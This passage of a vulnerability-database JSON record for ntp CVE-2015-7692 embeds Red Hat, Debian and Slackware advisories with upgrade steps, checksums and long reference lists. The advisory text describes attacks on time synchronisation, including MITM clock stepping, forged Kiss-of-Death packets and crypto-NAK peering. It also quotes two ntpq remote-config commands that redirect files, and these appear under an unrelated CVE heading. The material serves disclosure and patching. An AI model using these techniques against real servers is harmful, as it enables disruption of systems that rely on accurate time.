References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5194\nhttps://access.redhat.com/security/cve/CVE-2015-5195\nhttps://access.redhat.com/security/cve/CVE-2015-5196\nhttps://access.redhat.com/security/cve/CVE-2015-5219\nhttps://access.redhat.com/security/cve/CVE-2015-7691\nhttps://access.redhat.com/security/cve/CVE-2015-7692\nhttps://access.redhat.com/security/cve/CVE-2015-7701\nhttps://access.redhat.com/security/cve/CVE-2015-7702\nhttps://access.redhat.com/security/cve/CVE-2015-7703\nhttps://access.redhat.com/security/cve/CVE-2015-7852\nhttps://access.redhat.com/security/cve/CVE-2015-7974\nhttps://access.redhat.com/security/cve/CVE-2015-7977\nhttps://access.redhat.com/security/cve/CVE-2015-7978\nhttps://access.redhat.com/security/cve/CVE-2015-7979\nhttps://access.redhat.com/security/cve/CVE-2015-8158\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.3_Release_Notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYGvvBXlSAg2UNWIIRAhRGAJ44LtHkhexE/w50LEGifKeLUMXYkwCgmm/0\nXqilrenZq9cyvtnH8eGxdCw=\n=XqfK\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nCVE-2015-5300\n\n It was found that ntpd did not correctly implement the -g option:\n\n Normally, ntpd exits with a message to the system log if the offset\n exceeds the panic threshold, which is 1000 s by default. This\n option allows the time to be set to any value without restriction;\n however, this can happen only once. If the threshold is exceeded\n after that, ntpd will exit with a message to the system log. This\n option can be used with the -q and -x options. \n\n ntpd could actually step the clock multiple times by more than the\n panic threshold if its clock discipline doesn\u0027t have enough time to\n reach the sync state and stay there for at least one update. If a\n man-in-the-middle attacker can control the NTP traffic since ntpd\n was started (or maybe up to 15-30 minutes after that), they can\n prevent the client from reaching the sync state and force it to step\n its clock by any amount any number of times, which can be used by\n attackers to expire certificates, etc. \n\n This is contrary to what the documentation says. Normally, the\n assumption is that an MITM attacker can step the clock more than the\n panic threshold only once when ntpd starts and to make a larger\n adjustment the attacker has to divide it into multiple smaller\n steps, each taking 15 minutes, which is slow. For example:\n\n ntpq -c \u0027:config pidfile /tmp/ntp.pid\u0027\n ntpq -c \u0027:config driftfile /tmp/ntp.drift\u0027\n\n In Debian ntpd is configured to drop root privileges, which limits\n the impact of this issue. \n\nCVE-2015-7704\n\n If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet\n from the server to reduce its polling rate, it doesn\u0027t check if the\n originate timestamp in the reply matches the transmit timestamp from\n its request. An off-path attacker can send a crafted KoD packet to\n the client, which will increase the client\u0027s polling interval to a\n large value and effectively disable synchronization with the server. \n\nCVE-2015-7850\n\n An exploitable denial of service vulnerability exists in the remote\n configuration functionality of the Network Time Protocol. A\n specially crafted configuration file could cause an endless loop\n resulting in a denial of service. An attacker could provide a the\n malicious configuration file to trigger this vulnerability. \n\nCVE-2015-7855\n\n It was found that NTP\u0027s decodenetnum() would abort with an assertion\n failure when processing a mode 6 or mode 7 packet containing an\n unusually long data value where a network address was expected. \n\nCVE-2015-7871\n\n An error handling logic error exists within ntpd that manifests due\n to improper error condition handling associated with certain\n crypto-NAK packets. An unauthenticated, off-path attacker can force\n ntpd processes on targeted servers to peer with time sources of the\n attacker\u0027s choosing by transmitting symmetric active crypto-NAK\n packets to ntpd. This attack bypasses the authentication typically\n required to establish a peer association and allows an attacker to\n make arbitrary changes to system time. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:4.2.6.p5+dfsg-2+deb7u6. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p4+dfsg-3. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p4+dfsg-3. \n\nWe recommend that you upgrade your ntp packages. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes\n several low and medium severity vulnerabilities. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ne0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ndb0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz\n\nSlackware x86_64 -current package:\n8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2015-7692" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "BID", "id": "77285" }, { "db": "VULMON", "id": "CVE-2015-7692" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "136963" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "139511" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-7692", "trust": 3.5 }, { "db": "BID", "id": "77285", "trust": 2.0 }, { "db": "SECTRACK", "id": "1033951", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2015-007697", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201510-588", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.4 }, { "db": "JUNIPER", "id": "JSA10711", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2015-7692", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134102", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136963", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134034", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139511", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134162", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134137", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7692" }, { "db": "BID", "id": "77285" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "136963" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "139511" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "CNNVD", "id": "CNNVD-201510-588" }, { "db": "NVD", "id": "CVE-2015-7692" } ] }, "id": "VAR-201708-0212", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.17692308 }, "last_update_date": "2024-07-23T21:10:24.465000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Bug 1274254", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1274254" }, { "title": "NTP Bug 2899", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug2899" }, { "title": "NTP Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=119774" }, { "title": "Red Hat: Moderate: ntp security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162583 - security advisory" }, { "title": "Red Hat: CVE-2015-7692", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-7692" }, { "title": "Amazon Linux AMI: ALAS-2015-607", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-607" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2783-1" }, { "title": "Debian Security Advisories: DSA-3388-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=61fe4252a877d02aaea1c931efa0a305" }, { "title": "Symantec Security Advisories: SA103 : October 2015 NTP Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=f5e05389a60d3a56f2a0ad0ec21579d9" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Cisco: Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151021-ntp" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7692" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "CNNVD", "id": "CNNVD-201510-588" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "NVD", "id": "CVE-2015-7692" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.8, "url": "http://www.securityfocus.com/bid/77285" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-2583.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0780.html" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1274254" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/ntpbug2899" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1033951" }, { "trust": 1.7, "url": "http://www.debian.org/security/2015/dsa-3388" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171004-0001/" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7692" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.4, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151021-ntp" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5219" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5194" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5195" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-7692" }, { "trust": 0.3, "url": "https://github.com/ntp-project/ntp/blob/stable/news#l295" }, { "trust": 0.3, "url": "http://www.ntp.org" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10711" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10711\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024157" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099260" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099225" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985122" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986956" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988706" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989542" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5196" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5300" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5146" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-5219" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-5194" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7978" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7702" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7977" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7691" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-5195" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7701" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7852" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7703" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2016:2583" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2783-1/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2783-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.8_technical_notes/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.8_release_notes/index.html" }, { "trust": 0.1, "url": "http://www.cs.bu.edu/~goldbe/ntpattack.html" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "http://talosintel.com/vulnerability-reports/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-7979" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8158" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.3_release_notes/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-7974" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5196" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7848" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7705" }, { "trust": 